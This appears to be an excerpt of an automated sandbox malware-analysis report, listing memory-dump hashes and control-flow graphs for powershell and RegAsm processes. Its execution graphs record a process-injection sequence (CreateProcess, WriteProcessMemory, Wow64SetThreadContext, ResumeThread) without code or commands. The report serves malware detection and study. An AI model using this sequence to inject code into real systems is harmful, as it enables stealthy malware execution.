                                                              • API String ID:
                                                              • Opcode ID: 4127d83862082e5a5a75ff7f5832528e0578aa3a1c6e94d44b7c7d673e9cc4e9
                                                              • Instruction ID: d92b3168d3dac78b8a9d1b94fba33a2a2814467fce73361d9395eee5d43189ad
                                                              • Opcode Fuzzy Hash: 4127d83862082e5a5a75ff7f5832528e0578aa3a1c6e94d44b7c7d673e9cc4e9
                                                              • Instruction Fuzzy Hash: 6FF0BE31A0D5488FE754EB4CE445AA8B3E0FF04320B1500B7E009C7063DB2AEC54C754
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: ac63b412e0c0cbf952c404184577b8a4ed4a0f56f2ef6b016719bb4f0ef02fc0
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 44E0123170C8048FE6A9EB4CE0409A973E2FBA8371B1101B7D14EC7561C725EC558B84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                              • API String ID: 0-2388461625
                                                              • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                              • Instruction ID: 246d680f43fb5cf9f7d68663af1b8adec450393ad26462f8e6625c1b6df7f3db
                                                              • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                              • Instruction Fuzzy Hash: BD2107B3A895115AC30637BCFC515E86BC1EF543B874501F3E218CF113DA24648BCA9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N_^$N_^$N_^$N_^
                                                              • API String ID: 0-1196809394
                                                              • Opcode ID: 7bdcaa2f3786be7424c276a132a0ea9b6338178f87da09e3d74462bbd0011366
                                                              • Instruction ID: f2d5ee92db19aa421cc52acd49ba0e4a665c643d626554c8cfcda750947e0ea8
                                                              • Opcode Fuzzy Hash: 7bdcaa2f3786be7424c276a132a0ea9b6338178f87da09e3d74462bbd0011366
                                                              • Instruction Fuzzy Hash: A151B552E0E2D24FE393F2286C750F53F50DF522A5F1900F3D1999B0D3EB186846A26A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N_^$N_^$N_^$N_^
                                                              • API String ID: 0-1196809394
                                                              • Opcode ID: 43672c817faabf1dfd3461dd4b7f6df725ba52d2ac65bfc009477428d1903b27
                                                              • Instruction ID: cec43ad418100b8758a1cc38b84c0955b5f550498c3bb755c5aafefec0349910
                                                              • Opcode Fuzzy Hash: 43672c817faabf1dfd3461dd4b7f6df725ba52d2ac65bfc009477428d1903b27
                                                              • Instruction Fuzzy Hash: F4414153E0E6D24FF392A63C68750FA2F90DF522A4F0D00F7D1D99B093DA086446E26A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2343705254.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ff848c50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction ID: 715a2b63cf84a7cbce0682c4a8050d4c647038655c02f1c462a3bb900db61f69
                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction Fuzzy Hash: 8B01A73010CB0C4FDB44EF0CE051AA5B3E0FB95360F10052DE58AC3661DB32E882CB45

                                                              Execution Graph

                                                              Execution Coverage:6.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:16
                                                              Total number of Limit Nodes:2
                                                              execution_graph 2888 7ff848c85f3d 2889 7ff848c85f4b ResumeThread 2888->2889 2891 7ff848c86006 2889->2891 2892 7ff848c86038 2894 7ff848c86041 2892->2894 2893 7ff848c8602f 2894->2893 2895 7ff848c860d3 Wow64SetThreadContext 2894->2895 2896 7ff848c86104 2895->2896 2897 7ff848c865a4 2898 7ff848c865ad CreateProcessA 2897->2898 2900 7ff848c86d48 2898->2900 2901 7ff848c86244 2903 7ff848c8624d 2901->2903 2902 7ff848c8623f 2903->2902 2904 7ff848c86305 WriteProcessMemory 2903->2904 2905 7ff848c86346 2904->2905

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hsH$hsH
                                                              • API String ID: 0-2288426561
                                                              • Opcode ID: 5a4cb70541662bf96e30a1ac2751f0074ee0103ecbe4d76c3f8a4ea6a9b2e1bf
                                                              • Instruction ID: a40d354d0abc48b9219f38fb72992211a13a4f1c628092779729acf1ee40a6ba
                                                              • Opcode Fuzzy Hash: 5a4cb70541662bf96e30a1ac2751f0074ee0103ecbe4d76c3f8a4ea6a9b2e1bf
                                                              • Instruction Fuzzy Hash: A4B1A36190FBC64FE757AB3C5864A61BFE0EF57250B1901FBC089CB1A3DA189C4AC356

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: a1d0dc4579bf1628a8e714c3494d1383dacfdf06530f404960062cbb9771e28d
                                                              • Instruction ID: 36fac0a46c4c2bdc584728ef0e48ec411d8f2f6489652092168043bd85117b91
                                                              • Opcode Fuzzy Hash: a1d0dc4579bf1628a8e714c3494d1383dacfdf06530f404960062cbb9771e28d
                                                              • Instruction Fuzzy Hash: C5E1C53091CA8D4FDBA9EF28CC5A7E577E0FB55351F04426AD84DC7291DF38A9418B82

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 104 7ff848c86244-7ff848c8624b 105 7ff848c8624d-7ff848c86255 104->105 106 7ff848c86256-7ff848c86269 104->106 105->106 107 7ff848c8623f 106->107 108 7ff848c8626b-7ff848c862e5 106->108 112 7ff848c862ef-7ff848c86344 WriteProcessMemory 108->112 113 7ff848c862e7-7ff848c862ec 108->113 115 7ff848c8634c-7ff848c8637d 112->115 116 7ff848c86346 112->116 113->112 116->115
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 7100992aeb792f08ff3763289385c1e16402839ea65ef7b5da8dc4c9a90e0295
                                                              • Instruction ID: c3000752787796f86b909a4cafcb4e7df828925f48b921177b9ab8d55062a196
                                                              • Opcode Fuzzy Hash: 7100992aeb792f08ff3763289385c1e16402839ea65ef7b5da8dc4c9a90e0295
                                                              • Instruction Fuzzy Hash: 7641153190CB5C8FDB58EB98984A6F97BE0FB95311F00426FE049D3292DB78A8458786

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 0c7fa5e414630599ac28bd2f9240643333601cd2718096618f702b52c6079218
                                                              • Instruction ID: 8766c87642e4617ca79bb840bb36c51d0843827265723086726ece580b854634
                                                              • Opcode Fuzzy Hash: 0c7fa5e414630599ac28bd2f9240643333601cd2718096618f702b52c6079218
                                                              • Instruction Fuzzy Hash: 0431F831D0CB484FDB29EBA8A8496F97BE1EF55311F04423FD049D3592DF7864068795

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 132 7ff848c85f3d-7ff848c85f49 133 7ff848c85f4b-7ff848c85f53 132->133 134 7ff848c85f54-7ff848c85f63 132->134 133->134 135 7ff848c85f6e-7ff848c86004 ResumeThread 134->135 136 7ff848c85f65-7ff848c85f6d 134->136 141 7ff848c8600c-7ff848c86031 135->141 142 7ff848c86006 135->142 136->135 142->141
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 02816bd3cec202ae23c85edcc2d665bb0743d040b855016dbb1bc5e893f607d0
                                                              • Instruction ID: f951d44f275f366d67ba373a9a0bdd764f92ff51cc11a22c76cd114f53c4de3b
                                                              • Opcode Fuzzy Hash: 02816bd3cec202ae23c85edcc2d665bb0743d040b855016dbb1bc5e893f607d0
                                                              • Instruction Fuzzy Hash: 0931283190D7884FDB5AEB6888466E97FE0EF57321F0842AFC049C7193DA785405C792

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hsH
                                                              • API String ID: 0-2187675551
                                                              • Opcode ID: 111777aceef36d61303f0cc3f6dce760724ea264e2d3ecbcb351eefa8d03234d
                                                              • Instruction ID: 0fa7c8348cc0f0f7035a023599ec5810e4e2d77305db109bb1bf9746a9d2889d
                                                              • Opcode Fuzzy Hash: 111777aceef36d61303f0cc3f6dce760724ea264e2d3ecbcb351eefa8d03234d
                                                              • Instruction Fuzzy Hash: E241633160EBC98FDB46EF388450A657FA1EF57354B1901EBC089CB193C915EC4AC755

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 248 7ff848d50ade-7ff848d50af4 249 7ff848d50b0d-7ff848d50b12 248->249 250 7ff848d50af6-7ff848d50b03 248->250 251 7ff848d50b18-7ff848d50b1b 249->251 252 7ff848d50baa-7ff848d50bb4 249->252 250->249 257 7ff848d50b05-7ff848d50b0b 250->257 251->252 254 7ff848d50b21-7ff848d50b24 251->254 255 7ff848d50bb6-7ff848d50bc2 252->255 256 7ff848d50bc3-7ff848d50c06 252->256 258 7ff848d50b4b 254->258 259 7ff848d50b26-7ff848d50b49 254->259 257->249 262 7ff848d50b4d-7ff848d50b4f 258->262 259->262 262->252 264 7ff848d50b51-7ff848d50b5b 262->264 264->252 269 7ff848d50b5d-7ff848d50b73 264->269 271 7ff848d50b7a-7ff848d50b83 269->271 272 7ff848d50b9c-7ff848d50ba9 271->272 273 7ff848d50b85-7ff848d50b92 271->273 273->272 275 7ff848d50b94-7ff848d50b9a 273->275 275->272
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9005ca10411d78da13f4f599814762fc41e2aaf566ef860fcb368087907e674a
                                                              • Instruction ID: 74a2e2fe2c522be5804bf9d3e533bc93436b1fe3fa5443b6c3ef553094c872b2
                                                              • Opcode Fuzzy Hash: 9005ca10411d78da13f4f599814762fc41e2aaf566ef860fcb368087907e674a
                                                              • Instruction Fuzzy Hash: 03411622F1FE5A4FEBA9BA2814953B9B3D1EF44795F48007BD40DC3186DF08AC098795

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4be1990e08a31ef55925e0582ac60217ab641cf34e8cf4f6304421a130d5f535
                                                              • Instruction ID: 299135a81443335d7dcf2658a2d37e5598c299204abaeb5169295dabba6a09b7
                                                              • Opcode Fuzzy Hash: 4be1990e08a31ef55925e0582ac60217ab641cf34e8cf4f6304421a130d5f535
                                                              • Instruction Fuzzy Hash: 9B110B32B1EB444FEB59AA2C64052B9B7E1FF89165F0801BFD04AC3452DB15980A8245

                                                              Execution Graph

                                                              Execution Coverage:8.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:132
                                                              Total number of Limit Nodes:15
                                                              execution_graph 22478 5eab3b8 22479 5eab543 22478->22479 22480 5eab3de 22478->22480 22480->22479 22482 5ea9cb0 22480->22482 22483 5eab640 PostMessageW 22482->22483 22484 5eab6b2 22483->22484 22484->22480 22485 d28700 DuplicateHandle 22486 d2879c 22485->22486 22401 d22b1a 22402 d22abe 22401->22402 22404 d227d4 22402->22404 22405 d227df 22404->22405 22407 d28d2e 22405->22407 22408 d28448 22405->22408 22409 d28453 22408->22409 22410 d29ef4 22409->22410 22414 d28448 2 API calls 22409->22414 22417 d2a0d0 22409->22417 22422 d29ce4 22409->22422 22411 d2a115 22410->22411 22431 d2a278 22410->22431 22435 d2a280 22410->22435 22411->22405 22414->22410 22418 d2a0f1 22417->22418 22419 d2a115 22418->22419 22420 d2a280 2 API calls 22418->22420 22421 d2a278 2 API calls 22418->22421 22419->22410 22420->22419 22421->22419 22423 d29d0d 22422->22423 22424 d29ef4 22423->22424 22426 d2a0d0 2 API calls 22423->22426 22427 d29ce4 2 API calls 22423->22427 22428 d28448 2 API calls 22423->22428 22425 d2a115 22424->22425 22429 d2a280 2 API calls 22424->22429 22430 d2a278 2 API calls 22424->22430 22425->22410 22426->22424 22427->22424 22428->22424 22429->22425 22430->22425 22432 d2a28d 22431->22432 22434 d2a2c6 22432->22434 22439 d29970 22432->22439 22434->22411 22437 d2a28d 22435->22437 22436 d2a2c6 22436->22411 22437->22436 22438 d29970 2 API calls 22437->22438 22438->22436 22440 d2997b 22439->22440 22442 d2a338 22440->22442 22443 d299a4 22440->22443 22442->22442 22444 d299af 22443->22444 22449 d299b4 22444->22449 22446 d2a3a7 22453 d2f0b0 22446->22453 22447 d2a3e1 22447->22442 22450 d299bf 22449->22450 22451 d2b530 22450->22451 22452 d2a0d0 2 API calls 22450->22452 22451->22446 22452->22451 22455 d2f0e1 22453->22455 22457 d2f12d 22453->22457 22454 d2f0ed 22454->22447 22455->22454 22460 d2f0b0 2 API calls 22455->22460 22462 d2f328 22455->22462 22456 d2f2ea 22456->22447 22457->22456 22465 d2f378 22457->22465 22458 d2f332 22458->22447 22460->22457 22463 d2f332 22462->22463 22464 d2f378 2 API calls 22462->22464 22463->22457 22464->22463 22466 d2f389 22465->22466 22468 d2f3ac 22465->22468 22472 d2e284 22466->22472 22468->22458 22470 d2f5b0 GetModuleHandleW 22471 d2f5e3 22470->22471 22471->22458 22473 d2f568 GetModuleHandleW 22472->22473 22475 d2f394 22473->22475 22475->22468 22475->22470 22476 5eac3a0 DispatchMessageW 22477 5eac412 22476->22477 22487 5ea0040 22488 5ea0067 22487->22488 22489 5ea0baf 22488->22489 22490 5ea0f8a 22488->22490 22492 5ea00b3 22488->22492 22497 5ea1e68 22489->22497 22490->22492 22507 5eaa792 22490->22507 22513 5eaa757 22490->22513 22491 5ea0bb5 22503 5ea7c59 22491->22503 22498 5ea1e7b 22497->22498 22499 5ea1eb2 22498->22499 22519 5ea1faf 22498->22519 22526 5ea1fc0 22498->22526 22499->22491 22500 5ea1e8c 22500->22491 22533 5ea80c8 22503->22533 22537 5ea80c3 22503->22537 22504 5ea7cac 22504->22492 22508 5eaa797 22507->22508 22543 5eaa8b5 22508->22543 22548 5eaa7ff 22508->22548 22553 5eaa808 22508->22553 22509 5eaa7c8 22509->22492 22514 5eaa781 22513->22514 22516 5eaa808 CreateProcessW 22514->22516 22517 5eaa7ff CreateProcessW 22514->22517 22518 5eaa8b5 CreateProcessW 22514->22518 22515 5eaa7c8 22515->22492 22516->22515 22517->22515 22518->22515 22520 5ea1fd2 22519->22520 22523 5ea2057 22519->22523 22521 5ea20d3 22520->22521 22524 5ea1fdf KiUserCallbackDispatcher 22520->22524 22522 5ea1e68 KiUserCallbackDispatcher 22521->22522 22522->22523 22523->22500 22524->22523 22527 5ea1fd2 22526->22527 22528 5ea2057 22526->22528 22529 5ea20d3 22527->22529 22531 5ea1fdf KiUserCallbackDispatcher 22527->22531 22528->22500 22530 5ea1e68 KiUserCallbackDispatcher 22529->22530 22530->22528 22531->22528 22534 5ea80f0 22533->22534 22541 5ea6c38 GetSystemMetrics GetSystemMetrics 22534->22541 22536 5ea811f 22538 5ea80c8 22537->22538 22542 5ea6c38 GetSystemMetrics GetSystemMetrics 22538->22542 22540 5ea811f 22541->22536 22542->22540 22544 5eaa8bc 22543->22544 22547 5eaab22 22544->22547 22558 5ea9c18 22544->22558 22550 5eaa833 22548->22550 22549 5eaab22 22550->22549 22551 5ea9c18 CreateProcessW 22550->22551 22552 5eaa922 22551->22552 22554 5eaa833 22553->22554 22555 5ea9c18 CreateProcessW 22554->22555 22556 5eaab22 22554->22556 22557 5eaa922 22555->22557 22559 5eaaec0 CreateProcessW 22558->22559 22561 5eab0c9 22559->22561 22561->22561 22562 d254e8 KiUserExceptionDispatcher 22563 d25518 22562->22563 22564 d229ae 22565 d229b3 22564->22565 22566 d227d4 2 API calls 22565->22566 22566->22565

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1054 5ea9c18-5eaaf34 1057 5eaaf3f-5eaaf46 1054->1057 1058 5eaaf36-5eaaf3c 1054->1058 1059 5eaaf48-5eaaf4e 1057->1059 1060 5eaaf51-5eaaf58 1057->1060 1058->1057 1059->1060 1061 5eaaf5a-5eaaf76 1060->1061 1062 5eaaf77-5eaaf7b 1060->1062 1061->1062 1063 5eaaf9b-5eaafab 1062->1063 1064 5eaaf7d-5eaaf93 1062->1064 1065 5eaafca-5eaafce 1063->1065 1066 5eaafad-5eaafc9 1063->1066 1064->1063 1067 5eaafef-5eab008 1065->1067 1068 5eaafd0-5eaafe7 1065->1068 1066->1065 1069 5eab00a-5eab013 1067->1069 1070 5eab016-5eab01f 1067->1070 1068->1067 1069->1070 1071 5eab03a-5eab03e 1070->1071 1072 5eab021-5eab038 1070->1072 1073 5eab059-5eab06d 1071->1073 1074 5eab040-5eab051 1071->1074 1072->1071 1075 5eab06f 1073->1075 1076 5eab072-5eab0c7 CreateProcessW 1073->1076 1074->1073 1075->1076 1077 5eab0c9-5eab0cf 1076->1077 1078 5eab0d0-5eab101 1076->1078 1077->1078 1081 5eab103-5eab107 1078->1081 1082 5eab116-5eab11a 1078->1082 1081->1082 1083 5eab109-5eab10c 1081->1083 1084 5eab12f-5eab133 1082->1084 1085 5eab11c-5eab120 1082->1085 1083->1082 1087 5eab148-5eab14c 1084->1087 1088 5eab135-5eab139 1084->1088 1085->1084 1086 5eab122-5eab125 1085->1086 1086->1084 1089 5eab14e-5eab15a 1087->1089 1090 5eab15d 1087->1090 1088->1087 1091 5eab13b-5eab13e 1088->1091 1089->1090 1093 5eab15e 1090->1093 1091->1087 1093->1093
                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 05EAB0B1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: d727dca47326ab7f3fb16015ea731f35678041dd1f1f7080d87cbc6e2655a8b9
                                                              • Instruction ID: a4fa7478dd0724ea70536e8914a5281e7561a5bb833aa47f181dffb852c740bb
                                                              • Opcode Fuzzy Hash: d727dca47326ab7f3fb16015ea731f35678041dd1f1f7080d87cbc6e2655a8b9
                                                              • Instruction Fuzzy Hash: A19106B1D00309DFDB15CFA9C88479EBBF6BF88304F25812AE455AB250D770A945CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1094 5eaaebb-5eaaf34 1097 5eaaf3f-5eaaf46 1094->1097 1098 5eaaf36-5eaaf3c 1094->1098 1099 5eaaf48-5eaaf4e 1097->1099 1100 5eaaf51-5eaaf58 1097->1100 1098->1097 1099->1100 1101 5eaaf5a-5eaaf76 1100->1101 1102 5eaaf77-5eaaf7b 1100->1102 1101->1102 1103 5eaaf9b-5eaafab 1102->1103 1104 5eaaf7d-5eaaf93 1102->1104 1105 5eaafca-5eaafce 1103->1105 1106 5eaafad-5eaafc9 1103->1106 1104->1103 1107 5eaafef-5eab008 1105->1107 1108 5eaafd0-5eaafe7 1105->1108 1106->1105 1109 5eab00a-5eab013 1107->1109 1110 5eab016-5eab01f 1107->1110 1108->1107 1109->1110 1111 5eab03a-5eab03e 1110->1111 1112 5eab021-5eab038 1110->1112 1113 5eab059-5eab06d 1111->1113 1114 5eab040-5eab051 1111->1114 1112->1111 1115 5eab06f 1113->1115 1116 5eab072-5eab0c7 CreateProcessW 1113->1116 1114->1113 1115->1116 1117 5eab0c9-5eab0cf 1116->1117 1118 5eab0d0-5eab101 1116->1118 1117->1118 1121 5eab103-5eab107 1118->1121 1122 5eab116-5eab11a 1118->1122 1121->1122 1123 5eab109-5eab10c 1121->1123 1124 5eab12f-5eab133 1122->1124 1125 5eab11c-5eab120 1122->1125 1123->1122 1127 5eab148-5eab14c 1124->1127 1128 5eab135-5eab139 1124->1128 1125->1124 1126 5eab122-5eab125 1125->1126 1126->1124 1129 5eab14e-5eab15a 1127->1129 1130 5eab15d 1127->1130 1128->1127 1131 5eab13b-5eab13e 1128->1131 1129->1130 1133 5eab15e 1130->1133 1131->1127 1133->1133
                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 05EAB0B1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 4a907a00f88bc2d06375344c8b3e8c2cd3312c4b40198dc510f8adb64ea3f1fe
                                                              • Instruction ID: a7d457995590b7682b1392f2e924af5848e03b488fd17859df78e4cb7b8912b6
                                                              • Opcode Fuzzy Hash: 4a907a00f88bc2d06375344c8b3e8c2cd3312c4b40198dc510f8adb64ea3f1fe
                                                              • Instruction Fuzzy Hash: 6591F6B1D00319DFDB15CFA9C88479EBBF6BF88304F25812AE459AB250D770A945CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1134 d2f378-d2f387 1135 d2f3b3-d2f3b7 1134->1135 1136 d2f389-d2f396 call d2e284 1134->1136 1137 d2f3cb-d2f40c 1135->1137 1138 d2f3b9-d2f3c3 1135->1138 1141 d2f398-d2f3a6 1136->1141 1142 d2f3ac 1136->1142 1145 d2f419-d2f427 1137->1145 1146 d2f40e-d2f416 1137->1146 1138->1137 1141->1142 1150 d2f4e8-d2f5a8 1141->1150 1142->1135 1148 d2f44b-d2f44d 1145->1148 1149 d2f429-d2f42e 1145->1149 1146->1145 1151 d2f450-d2f457 1148->1151 1152 d2f430-d2f437 call d2e290 1149->1152 1153 d2f439 1149->1153 1185 d2f5b0-d2f5e1 GetModuleHandleW 1150->1185 1186 d2f5aa-d2f5ad 1150->1186 1156 d2f464-d2f46b 1151->1156 1157 d2f459-d2f461 1151->1157 1155 d2f43b-d2f449 1152->1155 1153->1155 1155->1151 1159 d2f478-d2f481 call d298d8 1156->1159 1160 d2f46d-d2f475 1156->1160 1157->1156 1165 d2f483-d2f48b 1159->1165 1166 d2f48e-d2f493 1159->1166 1160->1159 1165->1166 1167 d2f4b1-d2f4be 1166->1167 1168 d2f495-d2f49c 1166->1168 1175 d2f4c0-d2f4de 1167->1175 1176 d2f4e1-d2f4e7 1167->1176 1168->1167 1170 d2f49e-d2f4ae call d2e100 call d2e2a0 1168->1170 1170->1167 1175->1176 1187 d2f5e3-d2f5e9 1185->1187 1188 d2f5ea-d2f5fe 1185->1188 1186->1185 1187->1188
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: cbbdf4ff0ef1e99dfc93071f3d237ea25b874be6e1584d2dca6475243bacdc9b
                                                              • Instruction ID: 3d9338ebd3e9316d30b85635e8454fb203037902918b2e1b8d8edd4cd32b9abe
                                                              • Opcode Fuzzy Hash: cbbdf4ff0ef1e99dfc93071f3d237ea25b874be6e1584d2dca6475243bacdc9b
                                                              • Instruction Fuzzy Hash: 03815470A00B158FD724DF29E441B5ABBF5FF88708F04892ED48AD7A50DB74E806CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1190 5ea1fc0-5ea1fcc 1191 5ea1fd2-5ea1fd9 1190->1191 1192 5ea2126-5ea212e 1190->1192 1193 5ea1fdf-5ea2051 KiUserCallbackDispatcher 1191->1193 1194 5ea20d3-5ea20f3 call 5ea1e68 1191->1194 1209 5ea2057-5ea2059 1193->1209 1202 5ea20fe-5ea211e 1194->1202 1202->1192 1210 5ea205b-5ea208e 1209->1210 1211 5ea2090-5ea20d1 1209->1211 1210->1202 1211->1202
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(00000000,038942CC,028B514C), ref: 05EA2047
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 6e11792c26e202a5b63227fcc72515280c81a045170379c074e9e428316b599a
                                                              • Instruction ID: 628b5c08cd77bcde2d9975a7a993f716ca053cf872da5c3125f866526d42721e
                                                              • Opcode Fuzzy Hash: 6e11792c26e202a5b63227fcc72515280c81a045170379c074e9e428316b599a
                                                              • Instruction Fuzzy Hash: 7B315D317402009FC308EB69E895B5A77EAFF84704B4884A9E1469F269DF75ED06CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
